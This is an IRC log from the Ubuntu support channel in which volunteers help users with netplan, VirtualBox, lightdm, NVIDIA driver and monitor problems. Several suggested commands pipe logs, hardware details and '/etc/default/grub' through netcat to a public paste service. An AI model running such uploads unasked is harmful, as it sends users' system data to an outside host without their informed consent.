
netcrashtomreyn: thanks , ubottu00:01
tomreynlaserbeak4445: i would assume (don't really know netplan either, yet) that what you do not configur ein netplan won't get rendered into configurations and unconfigured NICs are not in use.00:01
tomreynlaserbeak4445: have you tried to verify this?00:02
tomreynas a last resort you could always use rfkill00:03
laserbeak4445tomreyn: You mean verify with 'ip address show'?00:03
tomreynlaserbeak4445: ip l, ip a, ip r, yes00:04
tomreynlaserbeak4445: but also by looking at the systemd-networkd configuration netplan rendered.00:05
laserbeak4445tomreyn: 'ip a' tell me that the state of my wifi adapter is down so I guess it's a good sign00:07
segersjerryHi, I'm trying to follow the walkthrough at https://help.ubuntu.com/community/ManyButtonsMouseHowto and the first thing he says to do is imwheel -c but when I do that all I get is "Configuration terminated by signal 11" Does anyone know of a better walkthrough?00:08
laserbeak4445and to check the systemd-networkd configuration netplan rendered, how can do that?00:09
laserbeak4445ok I figure it was with 'sudo systemctl status systemd-networkd'00:14
laserbeak4445when I check that, I get 'Link is not managed by us' beside the wifi adapter name..?00:15
tomreynso it's not managed by systemd-networkd00:16
tomreynmeaning it wont bring it up00:16
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laserbeak4445if it's not managed by systemd-networkd, could it also mean that it is manage by something else on the system or not really?00:19
tomreynnetwork-manager would be the other suspect00:20
tomreynthe actual systemd-networkd configuration file should reside in /etc/systemd/network/00:20
laserbeak4445but it's 18.04 server. network-manager is not installed by default afaik00:21
tomreyn"nmcli d" to see what it manages00:21
tomreyn"dpkg -l networkmanager" to see whether it's installed (ii).00:22
Bashing-omlaserbeak4445: -server is expected to use systemd-networkd, and it's configured via netplan .00:23
laserbeak4445I can confirm, there is no network-manager installed on my 18.04 server and it seems to only use networkd, so I should be fine..00:25
VectorXhi im installing vbox guest additions to a ubuntu guest, but it doesnt seem to take any effect, following, https://websiteforstudents.com/installing-virtualbox-guest-additions-on-ubuntu-18-04-beta/00:25
laserbeak4445Thanks guys for the help!00:26
tomreynVectorX: you cna install them from a terminal and watch the output. i assume also that the virtualbox guest additions version in ubuntu 18.04 won't actually work with an ubuntu 18.04 guest, since they can be too old.00:34
tomreynthat's 'too old' as in lacking patches needed to make them work well on ubuntu 18.04. if you'll run the latest upstream release (they also provide an apt repository) it should work out.00:36
VectorXtomreyn so how would i install it00:36
tomreynVectorX: what is "it"?00:37
VectorXvbox guest additions00:37
VectorXim sorry let me rewrite that so it maybe a bit more clear00:38
VectorXtomreyn so how would i install vbox guest additions on ubuntu 18.04 from the latest upstream as you mentioned00:38
VectorXi found this, but i dont know how to install it https://launchpad.net/ubuntu/bionic/+source/virtualbox-guest-additions-iso00:39
VectorXif that is something inline with what you are sayinh00:39
tomreynyou install the updated virtualbox release, then you insert the iso image on the guest's cdrom (using the menu option provided for it), then mount the iso on the guest, then change into the directory where you mounted it and run the installer .sh there and see what happens.00:39
VectorXok let me try that00:40
tomreynso that's basically the same process as on the tutorial you followed, just that you do it on a newer virtualbox release and thus with a newer guest additions ISO00:41
VectorXtomreyn thanks, that worked00:46
ghost_All please take a look at this https://www.hublinux.com/00:46
oerheksghost_, no spam, thanks.00:47
ghost_Well I wouldn't call it spam but that's just me00:47
Two_Dogsapport by default must be breaking some new privacy rule00:52
UIDNullI just installed Ubuntu onto my XPS which has a touchscreen. When I tap it does a double click. Anyone know how to fix this?00:57
gbellinozslash list ?01:21
zeon98Hi all01:22
zeon98Hi AarKnos01:26
zeon98Hi all01:28
zeon98Hi all01:28
RoadRunnercan't login on xubuntu 18.04 in gui (only in tty); changing lightdm's config doesn't solve the issue 'cause accountservice is running - is there a way to turn it off or change its config?01:40
RoadRunneror is it faster to reinstall os then trying to track down and fix this corruption (my /home is sepparate)?01:50
Two_DogsRoadRunner: have a home partition now? if yes then re-install is faster01:51
RoadRunnerTwo_Dogs: yes, I learned that lesson :)01:52
Two_DogsRoadRunner: cool, re-install then01:53
Two_DogsRoadRunner: save any folders/confs you tweaked01:53
RoadRunnerTwo_Dogs: all the app specific confs should be in /home, that is the whole idea, right?01:54
Two_DogsRoadRunner: yes, all those are safe, i meant something you tweaked on the system side01:55
Two_DogsRoadRunner: usually done in /etc , if you did you would remember doing so01:56
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RoadRunnerfor the future, is there a known issue with older aps using gtk 2, GL, etc. I would not want to be back in this boat again after installing something else tommorow?01:57
Two_DogsRoadRunner: install plasma desktop and no gtk issues :)01:58
oerheks"older apps"... who knows, in the future?01:58
RoadRunnerthe corruption likely occured after I installed xscreensavers/rss-glx which must have affected gtk01:58
oerheksoh, not the borked upgrade from 16.04 ?01:59
oerheksor 17.10, whatever :-P01:59
RoadRunnerborked? :)02:00
Two_Dogsi notice borked networking on upgrades02:01
RoadRunnerxscreensavers were installed by "Software" and rss-glx by Synaptic everything seemed to be  tied to bionic02:02
RoadRunneroerheks: so its a known issue?02:03
oerheksno idea there, https://bugs.launchpad.net/ubuntu/+source/rss-glx/+bugs02:11
gnuserMy Ubuntu bionic seems to have some memory recognition issue.. it shows total of 15GB as expected but the odd thing is, it shows used 6GB and free 2GB.. it seems to me the available memory is not matching the 16G total02:19
jpleaugnuser: where are you looking at to get your numbers?02:22
RoadRunnerany recommenadations for a decent screensaver package that will not crash xubuntu 18.04?02:25
Two_DogsRoadRunner: why not use pwr management, dim screen, suspend after ??min02:28
Two_DogsRoadRunner: on the default 18.04 it is avail option/s02:30
RoadRunnerTwo_Dogs: I like cool effects :)02:30
Two_DogsRoadRunner: heres a cool effect, wallpaper02:31
RoadRunnerTwo_Dogs: you are so retro :):)02:32
Two_Dogsscreensaver is overhead02:32
RoadRunnerthis corruption scarred me though, didn't think some app's gtk issue would deny me access to the system02:34
Two_Dogsseems odd that userspace app borks gdm02:34
RoadRunnerI am running xubuntu, in my case its lightdm02:35
Two_DogsRoadRunner: lightdm was default install?02:36
Two_DogsRoadRunner: you got someway to connect to borked via ssh perhaps?02:36
Two_DogsRoadRunner: well then you could see where who did what in the library with the candlestick02:37
RoadRunnerI can get in with tty02:38
Two_Dogslogs/journalctl etc02:38
Two_Dogsthen find cause of bork, the point is fixing issue, otherwise it might as well be windows02:38
RoadRunnerlooked at /var/log/syslog but its over 100 screens of text and nothing jumped out at me (but then, I am no expert)...02:40
Two_DogsRoadRunner: execute> journalctl -b --pri=3 ## them are errors only lines02:42
RoadRunneris there a way to check my current install against a healthy one  like with software updater or something?02:43
Two_Dogscomparing is so retro dude02:44
RoadRunnerbut beats looking for a needle in a haystack02:45
Two_Dogserrors stick out02:45
RoadRunnerwhich logs do you suggest I check?02:45
Two_Dogsi told you02:46
Two_DogsRoadRunner: execute> journalctl -b --pri=3 ## them are errors only lines02:46
RoadRunnerI  thought that command would work only on a specific log?02:46
Two_DogsRoadRunner: no, that is userspace/systemspace errors, on journalctl anyway02:47
Two_DogsRoadRunner: there is also xsession-errors log somewhere02:47
RoadRunnerok, assuming I dig up something, how do I copy that output to a usb?02:48
RoadRunnerremember, I only have tty02:48
Two_DogsRoadRunner: remember my asking about ssh in?02:51
RoadRunnerTwo_Dogs: I remember,  it's a no on that one02:52
Two_DogsRoadRunner: you got something you could use to ssh into the borked from within the lan? phone? working linux? ipad? etc02:53
RoadRunnerI got a working linux on this lan, but then I'd have to install ssh on  "borked" and I am afraid you'd have to spoon feed me through the rescue...02:55
Two_DogsRoadRunner: well, right now all we are doing is playing suppose and maybe02:56
Two_Dogsi hate suppose and maybe, besides i gave you the command to get somewhere already02:57
RoadRunnerworking on that now02:57
Two_Dogsits that or i continue to break virt of 18.04 just because02:57
Two_Dogsthe gnome-shell panel cant be placed on top?02:58
RoadRunnerjust tty03:03
RoadRunnerran your command03:03
RoadRunnergot 8 lines of errors03:03
Two_DogsRoadRunner: is pastebinit installed on borked?03:05
syb0rgRoadRunner, I wasn't here when this convo started but if you have errors it generally is a good idea to share them03:05
Two_DogsRoadRunner: what syb0rg said :)03:05
RoadRunnerhere is one:  lightdm [729]: PAM unable to dlopen(pam_kwallet.so): /lib/security/pam_kwallet.so: cannot open shared object03:05
RoadRunnerno pastebinit is not installed03:06
Two_DogsRoadRunner: install it on borked03:06
Two_DogsRoadRunner: sudo apt install pastebinit03:06
Two_Dogson borked03:06
Two_DogsRoadRunner: execute> journalctl -b --pri=3 | pastebinit ## gets url, share url here03:07
RoadRunnerTwo_Dogs: after your command, can't get back to command input03:08
Two_DogsRoadRunner: exact command executed, show here03:08
RoadRunnerTwo_Dogs: I understand, but after running that command I can't get back to command input03:09
Two_Dogshttp://paste.ubuntu.com/p/KFyCRbzdrd/ i tested here, works03:09
Two_DogsRoadRunner: show command you executed here03:10
Two_Dogsjournalctl -b --pri=3 | pastebinit <-- this is what i executed03:10
RoadRunnerTwo_Dogs: journalctl -b --pri=3 | pastebinit ##   <-is what I did03:11
RoadRunnersorry:  journalctl -b --pri=3 ##03:11
Two_Dogsjournalctl -b --pri=3 | pastebinit <-- do RoadRunner03:12
RoadRunnergive me time to reboot, install pastbinit and run your command03:12
Two_DogsRoadRunner: anything after a '#' is a remark and not code to run03:13
Two_Dogsgnome-shell is a very nice desktop actually, i have kde apps running with qt5ct and they look great03:15
Two_Dogslogout does not seem to be something ready available though03:16
RoadRunnerTwo_Dogs: http://paste.ubuntu.com/p/zx3MStwf4S/03:21
Two_Dogsthose errors dont count :)03:23
RoadRunnerwhat are they?03:26
Two_DogsRoadRunner: i would re-install lightdm03:26
eikhey guys03:26
eiki need some help booting into Ubuntu x.x03:26
RoadRunnerTwo_Dogs: how?03:26
Two_DogsRoadRunner:  copy/paste & execute via terminal> sudo aptitude reinstall lightdm03:27
eiki used Rufus to make a bootable usb stick03:27
eikbut i just booted into it and it just spit me into grub03:28
eikit's been like 3 years since i last used Ubuntu how do i get in03:28
lighthunterbeen struggling to get my laptop working again since upgrading from Ubuntu 17.10 to 18.04. i have an NVIDIA GeForce GTX 1050 Ti graphics card. when i upgraded to 18.04 i started getting a black screen on boot after the Ubuntu splash screen. since then i have installed the nvidia-driver-396 from the graphics-drivers PPA. at first it didn't resolve my inability to boot, so i deleted03:28
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eiki have the correct root i'm assuming (the USB stick)03:29
eikbut i don't know where to load the kernel from03:29
eiki thought it would have just booted into Ubuntu, not grub03:30
lighthunter... /etc/X11/xorg.conf per #72 from https://bugs.launchpad.net/ubuntu/+source/nvidia-graphics-drivers-390/+bug/1752053/+index?comments=all. now my laptop boots, but i can't get it to display on my external monitor anymore.03:30
ubottuLaunchpad bug 1752053 in nvidia-graphics-drivers-390 (Ubuntu) "nvidia-390 fails to boot graphical display" [Critical,Fix released]03:30
Two_Dogslighthunter: you installed over the older nvidia driver ?03:30
lighthunteri ran `sudo apt purge *nvidia*` before installing nvidia-driver-396.03:31
Two_Dogslighthunter: ok03:31
lighthunter(and sudo apt autoremove)03:31
eikcan someone please help me /_\03:32
Bashing-omlighthunter: Secure boot disabled ?03:32
RoadRunnerTwo_Dogs: "aptitude" didn't fly03:34
eikthere we go!!03:34
RoadRunnerTwo_Dogs: how about just sudo apt install lightdm?03:34
eiktyped exit to reach windows boot manager, chose Ubuntu with CAPITAL U, and we in03:35
eikbut why were there two options in first place03:36
eikone lowercase (grub), one uppercase (proper)03:36
lotuspsychjegood morning to all03:37
SporkWitchthat's an oxymoron03:37
lighthunterBashing-om: yes, i disabled secure boot.03:42
Bashing-omlighthunter: K; what now does the gpu-manager log relate ? pastebin ' cat /var/log/gpu-manager.log ' .03:45
RoadRunnerTwo_Dogs: ok, removed, purged, reinstalled lightdm - no diff03:52
jmaderoctrl + .alt + f1 sends me to GUI login instead of TTY in Ubuntu 18.04, is there a workaround for this?03:52
Bashing-omlighthunter: Intel hybrid system .. what shows '03:53
Bashing-omecho $XDG_SESSION_TYPE ' ?03:54
RoadRunnerTwo_Dogs: if you have any other ideas I'll be happy to try them03:56
tsarompyhai #ubuntu03:57
Bashing-omlighthunter: so far so good . pastebin ' lsmod | grep nvidia ; dpkg -l | grep -i nvidia* ' .03:57
MerysanI'm new here :) first time using an IRC client :)04:00
MerysanCan someone tell me something I should now? :) please :)04:00
Bashing-omMerysan: Welcome to ubuntu support :)04:01
MerysanThank you :)04:01
MerysanI just followed a tutorial.. and it led me here :)04:01
=== Tempesta_ is now known as Tempesta
jmaderoMerysan: IRC is about asking specific questions that need answered, genreally "tell me something I should know" generally won't get responses04:02
lotuspsychjeMerysan: this channel takes ubuntu issues/questions, feel free to ask 'if' you have a problem04:02
lenovogestalt _ruben04:04
lighthunterMerysan: i will try to set a good example for you since i am currently asking for help ;).04:06
Merysanokay :) I'll observe the community :) thanks for helping out :)04:08
fl00fykittryyou should know what | does04:08
jmaderolol maybe a good lesson is not 20 smiley faces over 4 lines of text :-b04:08
lighthunterMerysan: in the meantime, https://github.com/fizerkhan/irc-etiquette has a good summary of the differences between typical face-to-face human interactions and typical human interactions over IRC.04:09
jmaderodid Ubuntu change the behavior of ctrl+alt+f1? how can I get to TTY1 now?04:09
Bashing-omlighthunter: Humm, Mo fault found to this time .. what shows ' sudo lshw -C display ' ?04:09
Bashing-omjmw: The GUI now rins in TTY1 .04:11
jmaderoBashing-om: hm - how can I get to a terminal, I've had to hard reboot several times because I can't get to a TTY1 terminal to kill software04:11
lighthunterMerysan: much of the rationale for that guide comes from the fact that there are, for example, 1,650 users (admittedly probably not all human) in this chatroom at the moment.04:12
lighthunterjmadero: Ctrl + Alt + F204:13
lighthunter(or F3, F4, ...)04:13
Bashing-omjmadero: try as F2 ?04:13
jmaderowill try, brb04:13
jmaderodoesn't do anything at all04:13
lighthunteri have noticed that sometimes i have to try a few times and/or there is a considerable latency.04:14
lighthunterperhaps this is obvious, but you can use Ctrl + Alt + F1 to return to the GUI.04:14
Bashing-omlighthunter: All the pieces are present . I do not have the skills to say why the desktop is a black screen :(04:15
jmaderolighthunter: in all other versions of Ubuntu and in any other distro I've used F1 is for TTY1 terminal which was ALWAYS useful for killing software that is leaking memory or causing other issues04:16
jmaderoI may have to explore other distros again if I can't get to a TTY terminal - this is super weird04:16
jmaderoAH f3 !04:16
lighthunterBashing-om: to be clear, i can boot just fine ever since i deleted /etc/X11/xorg.conf. i simply can't get my computer to recognize an external monitor.04:16
Two_Dogslighthunter: is the monitor connected now?04:17
lighthunterjmadero: yes, Ctrl + Alt + F1 was changed in Ubuntu to be the place the GUI lives.04:17
lighthunterTwo_Dogs: yes04:17
Two_Dogslighthunter: does 'xrandr' see both displays?04:18
Bashing-omlighthunter: Try from a cold boot with the external monitor connected . Does the kernel then pick it up ?04:19
lighthunter_running experiment... brb_04:19
ubottuThe Ubuntu forums can be found at https://ubuntuforums.org. Kubuntu Forums are found at https://www.kubuntuforums.net. There is also a channel on freenode IRC #ubuntuforums04:20
Two_Dogsubuntu forums borked or the link?04:21
Bashing-omTwo_Dogs: I am logged into the forum, I have not seen any issues .. lemme check again .04:22
Two_DogsBashing-om: share link pls04:23
Bashing-omTwo_Dogs: No problem with the dorum seen here . and the link is correct .04:23
lighthunterrebooting with the external monitor connected didn't do the trick, unfortunately.04:23
Bashing-omTwo_Dogs: Presently at https://ubuntuforums.org/search.php?searchid=17432753 .04:24
Bashing-omlighthunter: excuse the obvious, but a known good cable ?04:25
Two_DogsBashing-om: your link works04:26
lighthunterhe he, fair question. at the very least, i can promise you the cable worked before i upgraded to Ubuntu 18.04.04:26
Two_Dogslighthunter: share Xorg.0.log pls04:27
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Two_Dogslighthunter: either i have seen you ask the same question once before or someone else has same issue or had04:28
lighthunteryeah, i was here earlier today too. thewaspsknees helped me get to the point where i am now since previously i couldn't even boot. there are a number of folks with my issue though.04:29
lighthunterTwo_Dogs: would you like the Xorg.0.log in ~/.local/share/xorg/, /var/log/, or /var/lib/gdm3/.local/share/xorg/?04:30
lighthunterBashing-om: i can confirm that the same HDMI cable currently works with a different laptop also running Ubuntu 18.04 (but lacking the oh so troublesome NVIDIA graphics card).04:31
Two_Dogslighthunter: i hope the all say same thing, the gdm3 one04:31
Bashing-omTwo_Dogs: lighthunter : Huh ? " 36.435] xf86EnableIOPorts: failed to set IOPL for I/O (Operation not permitted) " new one on me !04:37
Two_DogsBashing-om: thats a google04:37
Two_Dogslighthunter: did you test with default driver?04:41
lighthunterdo you mean the proprietary nvidia-390 driver, nouveau, or something else?04:42
Two_Dogslighthunter: did you test with default driver? i mean using system with nvidia purged04:45
lighthunteryeah, i believe that would be the nouveau driver. i wasn't able to boot in that case without specifying nomodeset.04:46
lighthunter(that much was consistent between Ubuntu 17.10 and Ubuntu 18.04.)04:47
Two_Dogslighthunter: ok, but were both displays avail?04:48
Two_Dogslighthunter: install inxi04:49
lighthunteri didn't check :-/.04:50
lighthunterinstalling inxi04:51
Two_Dogslighthunter: copy/paste & execute via terminal> inxi -SGrxxzc0 | nc termbin.com 9999 ## share link output here04:51
Two_Dogsthere is no personal data in dump unless you are hardware04:51
Two_Dogslighthunter: copy/paste & execute via terminal> journalctl --dmesg --pri=3 | nc termbin.com 9999 ## share link output here04:55
Two_Dogsthat ubuntu forum is difficult to search04:56
lighthunterwhich forum are you in out of curiosity?04:58
Bashing-omTwo_Dogs: search ubuntu forum - yeah . better result searching from google as ' site:ubuntuforums.org. <search term> ' .04:59
lighthunteroh, that ubuntu forum, lol; gotcha.04:59
=== Jochen_wvdT is now known as Schlawiner
Two_DogsBashing-om: thnks05:00
Two_Dogslighthunter: copy/paste & execute via terminal> (inxi -CMxc0 ; inxi -lsmod ; dkms status) | nc termbin.com 9999 ## share link output here05:05
lighthunterhttp://termbin.com/o2cn (although it looks kinda funky... lots of special characters?)05:08
Two_Dogshttps://goo.gl/4R8Lnu lighthunter you are not alone05:09
Two_Dogslighthunter: inxi -.......Charlie-zero05:10
MimasDoes anyone know how I can run a virtual Ubuntu on a Win10 machine using Hyper-V? If I turn off Hyper-V I can use VirtualBox, but I can't use Docker at the same time05:10
Two_Dogslighthunter: copy/paste & execute via terminal> (lsmod ; dkms status) | nc termbin.com 9999 ## share link output here05:12
lotuspsychjeMimas: there a nice #vbox channel if you want05:13
Mimasthanks lotuspsychje I'll check there05:14
lighthunterTwo_Dogs: hmm... yeah... that was charlie zero05:14
lighthuntersorry that i can't confirm by copying and pasting05:14
lighthunteri am using an IRC client that has Ctrl + C bound to disconnect by default lol05:14
Two_Dogslighthunter: copy/paste & execute via terminal> (lsmod ; dkms status) | nc termbin.com 9999 ## share link output here05:16
Two_Dogslighthunter: can you disable onboard 'intel' graphics via bios?05:20
lighthunterwill try... brb05:23
whoamihelo world05:40
lighthunterTwo_Dogs: unfortunately, no, there is no way to disable intel in my UEFI settings :-/.05:41
Two_Dogslighthunter: ok05:41
whoamiyes man05:42
barcodewhere is arch linux channel ?05:43
barcodebut in #archlinux i should register ! how can i register ?05:43
matjambarcode: https://freenode.net/kb/answer/registration05:44
barcodematjam: thanks but i read it before and im confused :(05:45
Two_Dogslighthunter: you have edited /etc/default/grub previously?05:46
Guy1524_hey guys, I am having a really strange issue05:46
matjambarcode: barcode try #freenode05:46
Guy1524_starting yesterday, my powerful laptop has gotten a lot slower on Ubuntu05:47
Guy1524_and the reason is really weir05:47
matjambarcode: this channel is for Ubuntu support.05:47
Guy1524_my CPU usage won't go above a certain percentage05:47
Guy1524_causing my computer to lag05:47
matjamGuy1524_: your machine may be overheating, some chipsets throttle CPU when they are running hot.05:47
Guy1524_my machine isn't hot though05:47
Guy1524_it's a really strange issue05:48
matjamit might not feel hot to you but if the built-in sensor is faulty it could be reading a high temperature.05:48
lighthunterTwo_Dogs: i don't recall ever editing /etc/default/grub, which i suppose isn't necessarily the same thing :-/.05:49
SuperLagWhat is the "madison" argument to apt-cache for?05:49
novalhello man05:49
Two_Dogslighthunter: copy/paste & execute via terminal> cat /etc/default/grub | nc termbin.com 9999 ## share link output here05:50
matjamSuperLag: if you "man apt-cache" and type "/madison" and hit enter, you'll see the explanation05:50
Guy1524_it's weird because it just starte happening05:50
Guy1524_I wasn't even doing much05:50
Guy1524_when it started05:50
SuperLagmatjam: Well, that was awesome: man: nroff: Bad system call (core dumped)05:51
matjamSuperLag: lol05:51
Two_Dogslighthunter: what method did you use to install nvidia driver?05:51
matjamSuperLag: wow, that should not be happening05:51
SuperLagmatjam: I've tried it with both bash and fish. Same result.05:51
lighthunter"Software & Updates > Additional Drivers > Apply Changes"05:52
matjamSuperLag: you on 64bit?05:52
SuperLagmatjam: yep05:52
lighthunter(before that i did sudo add-apt-repository ppa:graphics-drivers/ppa.)05:53
barcodematjam: i regester my nickname but can't find any emails on my mail account05:55
Two_Dogslighthunter: what editor do you use ? and know how to edit system files?05:55
lighthuntervim and yes05:56
SuperLagbarcode: check your spam folder05:56
matjambarcode: please ask in #freenode, this is not a support channel for freenode, #freenode is.05:56
barcodeSuperLag: nothing05:56
SuperLagbarcode: and like matjam said... #freenode05:56
matjamSuperLag: I see some related bugs in debian which look similar to that error message .. 18.04?05:57
SuperLagmatjam: yep05:57
Two_DogsGRUB_CMDLINE_LINUX_DEFAULT="quiet splash i915.modeset=0" <-- lighthunter make change to file to reflect the added option05:57
Two_Dogsi915.modeset=0 <-- added to line lighthunter05:57
lighthunterroger; done. do i need to run sudo update-grub or something like that?05:58
Two_Dogslighthunter: the point of the exercise is to blacklist i915 intel graphics05:58
Two_Dogslighthunter: yes, do05:59
Two_Dogsupdate-grub, do05:59
lighthunterand now reboot?05:59
Two_Dogsyes do :)05:59
lighthunteryeehaw; brb05:59
whoamihow are you06:00
matjamSuperLag: I feel like thats a bug in man-db06:01
matjamSuperLag: i looked on launchpad but dont see anything relevant06:01
whoamisleepy princess06:03
SuperLagmatjam: so much for man lookups :D06:03
whoamihey man where are you life?06:04
matjamSuperLag: so http://manpages.ubuntu.com/manpages/bionic/man8/apt-cache.8.html06:04
barcodeno one answer in #freenode :) hahaha06:04
matjamSuperLag: its some old command emulation thing.06:04
matjambarcode: we can't help you here, please just be patient there.06:05
whoamijust kidding:D06:05
barcodematjam: okey thanks all06:05
whoamiokey man:)06:06
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SuperLagmatjam: interesting. Thank you.06:11
SuperLagAny of you folks use Docker on Ubuntu? (that's how I got to looking at apt-cache stuff)06:12
SuperLagI'm trying to figure out the right package name to install, because even though I've added the repo, there is no package called "docker-ce"06:13
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matjamSuperLag: probably because the bionic build doesn't exist yet: https://download.docker.com/linux/ubuntu/dists/bionic/pool/stable/amd64/06:14
SuperLagmatjam: looks like it's docker.io06:14
SuperLagas there was already a package called docker, but it's something else06:15
matjamyes, docker.io have not published docker for bionic yet.06:15
matjamI got the url from https://docs.docker.com/install/linux/docker-ce/ubuntu/#set-up-the-repository06:15
Two_Dogsdocker in flatpak?06:15
SuperLagit does work here06:16
Teguat least there is some docker.io package  https://packages.ubuntu.com/bionic/docker.io06:16
matjamSuperLag:  you could install one of the packages from here https://download.docker.com/linux/ubuntu/dists/bionic/pool/test/amd64/06:16
lighthunterTwo_Dogs: boot hung at the splash screen with i915.modeset=0 :-/.06:16
matjambut you know, not supported, yadda yadda. What did the #docker peeps say06:16
matjamyou should probably go talk to them.06:17
SuperLagmatjam: I went there first. Pretty quiet this time of night.06:17
matjamwell, you know, we only support #ubuntu in here, not docker ..06:17
Two_Dogslighthunter: or nvidia is hanging at splash screen?06:18
SuperLagmatjam: I knew the drill. Thank you for the goodwill, in any case.06:18
matjamunless its the docker package in ubuntu, then we can support that06:18
matjamie, docker.io06:18
lighthunterTwo_Dogs: certainly possible, i didn't mean to imply that it wasn't nvidia.06:19
Two_Dogslighthunter: hard to tell, i'll assume i915 is not playing anymore if that option is used06:20
Two_Dogslighthunter: something else, i would have expected nvidia install to blacklist i915 and nouveau, i915 was active in lsmod and inxi saw it also06:21
Two_Dogslighthunter: what about the nvidia being borked, considered install of nvidia from nvidia web site?06:22
Two_Dogslighthunter: besides everything else being possible cause, tried another kernel? your kernel is current?06:23
lighthuntercould be ... i am reluctant to install from the .run if that's what you mean, because it isn't packaged and doesn't seem to uninstall properly. (also, it didn't come anywhere close to working for me on Ubuntu 17.10.)06:25
lighthunteri am on 4.15.0-22-generic.06:26
lighthunteri haven't tried another kernel yet.06:26
lighthunteri haven't tried the nvidia-390 PPA driver either.06:26
Two_Dogslighthunter: the kernel on 17.10 was what? and were you using exact driver for nvidia also?06:27
Two_Dogslighthunter: i would use the nvidia ppa before joebobs ppa06:27
lighthunteri was using nvidia-384 if i remember correctly06:28
lighthunternot sure what the kernel was, but i was just using whatever the default was for Ubuntu06:28
Two_Dogslighthunter: if you use nvidia ppa then purge first06:28
lighthunteryeah, i always purge first with these graphics drivers, but thank you for the reminder.06:28
lighthunteri am going to have to continue tomorrow unfortunately, but will try those suggestions and be back online tomorrow if i'm still stuck.06:29
matjamthe PPAs are much safer to install than the .run things, I never use them.06:29
Two_Dogslighthunter: i saw one search hit that made some sense, it said that when you got a driver:intel,nvidia thing going intel trumps and drm screws up and somehow that borks displays avail, no idea, but that was the reason for the blacklist of i915, and if you blacklisted 1915 via the modres.d method i bet you would be seeing black screen06:31
lighthunterinteresting; i take it i915 is the intel graphics card?06:31
Two_Dogslighthunter: indeed, the driver for intel graphics card06:32
lighthuntergotcha; yeah, i think i probably need that driver working too, no?06:34
Two_Dogsintel driver consumes less batt, working alone06:36
thinkyi am having problem with Opera browser on ubuntu 18.0406:39
lighthunteryeah, for sure; it's a performance/battery power tradeoff.06:40
thinkywhen i try to stream a video on a website, it freezes. it doesnt let me use mouse or use anything06:40
thinkyit just stucks a06:40
thinkycant even open terminal when it happens06:40
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thinkyhow can i fix this problem?06:40
gbellinozthinky: meaning like YouTube?  Which browser?  How do you get out of it?06:40
thinkygbellinoz: Opera browser06:40
thinkyno not like youtube06:40
Two_Dogsthinky: use some other browser to test06:40
thinkyi didnt try youtube06:40
thinkyTwo_Dogs: firefox working well06:41
thinkybut Opera doesnt06:41
Two_Dogsthinky: so opera is not gonna be on the menu06:41
thinkybut i want to use Opera06:42
matjambut we don't support Opera06:42
thinkyit is a problem and should be fixed06:42
gbellinozSo, see if the website / type of video matters.  Also, does it freeze the OS or the application (Opera)?06:42
matjamgo talk to the developers of Opera.06:42
thinkyis there opera channel here?06:42
matjamno idea.06:42
thinkyjust kicked from opera channel invite only06:42
Two_Dogsthinky: opera is not opensource06:43
matjamI'm sure they have a website.06:43
gbellinozSomeone should totally make a web browser without a web site :)06:43
thinkyit maybe driver or codec problem06:46
Two_Dogsthinky: run opera from terminal, see if you can tell whats illing it06:56
firezepmaybe I'm not supposed to ask this here, but whats a proper imghosting, if I may ask06:58
Two_Dogsfirezep: there are so many its hard to tell which are 'proper'07:00
firezepalright makes sense, what would you recommend off personal experience07:01
Two_Dogshttp://susepaste.org/ <-- my preferred one firezep07:01
firezepthanks, my dawg ;P07:01
Two_Dogs:) ok07:01
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purpleunicornWhy is Ubuntu lagging on my Mac07:22
Two_Dogspurpleunicorn: 'why' is difficult to troubleshoot07:23
purpleunicornI think I have to shut my computer down it’s literally frozen now07:24
purpleunicornNever mind not my computer I meant Ubuntu07:24
Two_Dogspurpleunicorn:  copy/paste & execute via terminal> journalctl -b --pri=3 ## anything interesting?07:25
purpleunicornMy laptop is overheating like crazy07:26
purpleunicornI can even hear the fan07:26
purpleunicornTwo_Dogs: I was just typing it in and all of a sudden the screen turned black07:28
purpleunicornShould I shut down or power off Two_Dogs07:29
purpleunicornThis is what I got07:34
Two_Dogspurpleunicorn: so you dont have to take pics, install 'pastebinit' thus> sudo apt install pastebinit07:36
Two_Dogspurpleunicorn:  copy/paste & execute via terminal> journalctl -b --pri=3 | pastebinit ## share link/url here07:37
RDmonI am in the middle of ubuntu 18.04 server edition and I am stuck because it doesn't pick up the luks and lvm partitions07:38
purpleunicornWhat do I do after it says processing triggers for man-db.. Two_Dogs07:41
Two_Dogspurpleunicorn:  copy/paste & execute via terminal> journalctl -b --pri=3 | pastebinit ## share link/url here07:41
Two_Dogspurpleunicorn: do ^^07:41
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purpleunicornhttps://pastebin.com/XpJe0Ysq Two_Dogs07:52
purpleunicornThe only reason I was confused was because you typed paste bin it together so I thought it was separate software SMH07:53
Two_Dogspurpleunicorn: one word, ubuntu is in virtualbox?07:55
Two_Dogspurpleunicorn: in that case the whole of the guest session is one big app running, you stressing the host and its impossible to tell from the guest what the cause is, reduce cpu usage, maybe on the host config side of virtualbox,07:57
Two_Dogspurpleunicorn: you got something beefier to run the virtualbox in?07:59
purpleunicornNo idk what else to run it in08:00
purpleunicornTwo_Dogs: I’ll try and lower the cpu08:00
Two_Dogsgood idea ^^08:00
Two_Dogspurpleunicorn: if you have ram to spare add to guest session08:01
Two_Dogspurpleunicorn: install 'inxi' so> sudo apt install inxi08:02
purpleunicornIt says the processor is on 1 CPU rn which is lowest obviously. On the motherboard tab the base memory is 6000mb which i don’t think it’s that important but I thought I’d let you know. Two_Dogs08:03
Two_Dogspurpleunicorn: six gig is more than enough08:04
purpleunicornDo I install inxi on Mac or Ubuntu08:04
Two_Dogsyou can lower that to 4000008:04
Two_Dogspurpleunicorn: any command i ask for in on linux/ubuntu08:04
purpleunicornYou mean 400008:04
Two_Dogsyes, 4k08:05
Two_Dogspurpleunicorn: you will have to check temps via some app on the mac08:05
purpleunicornYeah I have that app already. I’ll check in a few08:06
Two_Dogspurpleunicorn i am in a virt also and sensors command shows a bork as it should, no sensors in a virt Error: Cannot gist empty files08:07
Two_Dogsno sensors found oops08:07
purpleunicornWhat do I do now Two_Dogs08:08
Two_Dogspurpleunicorn: what are you wanting to achieve?08:08
purpleunicornI want it to not be so laggy.08:09
Two_Dogspurpleunicorn: you installed inxi?08:09
Two_Dogspurpleunicorn:  copy/paste & execute via terminal> inxi -Fxztcm10 -c0 | pastebinit08:10
Two_Dogspurpleunicorn: share link08:12
purpleunicornTwo_Dogs: ok08:13
purpleunicornhttps://pastebin.com/YhCSJCWB Two_Dogs08:16
Two_Dogspurpleunicorn: link is borked08:17
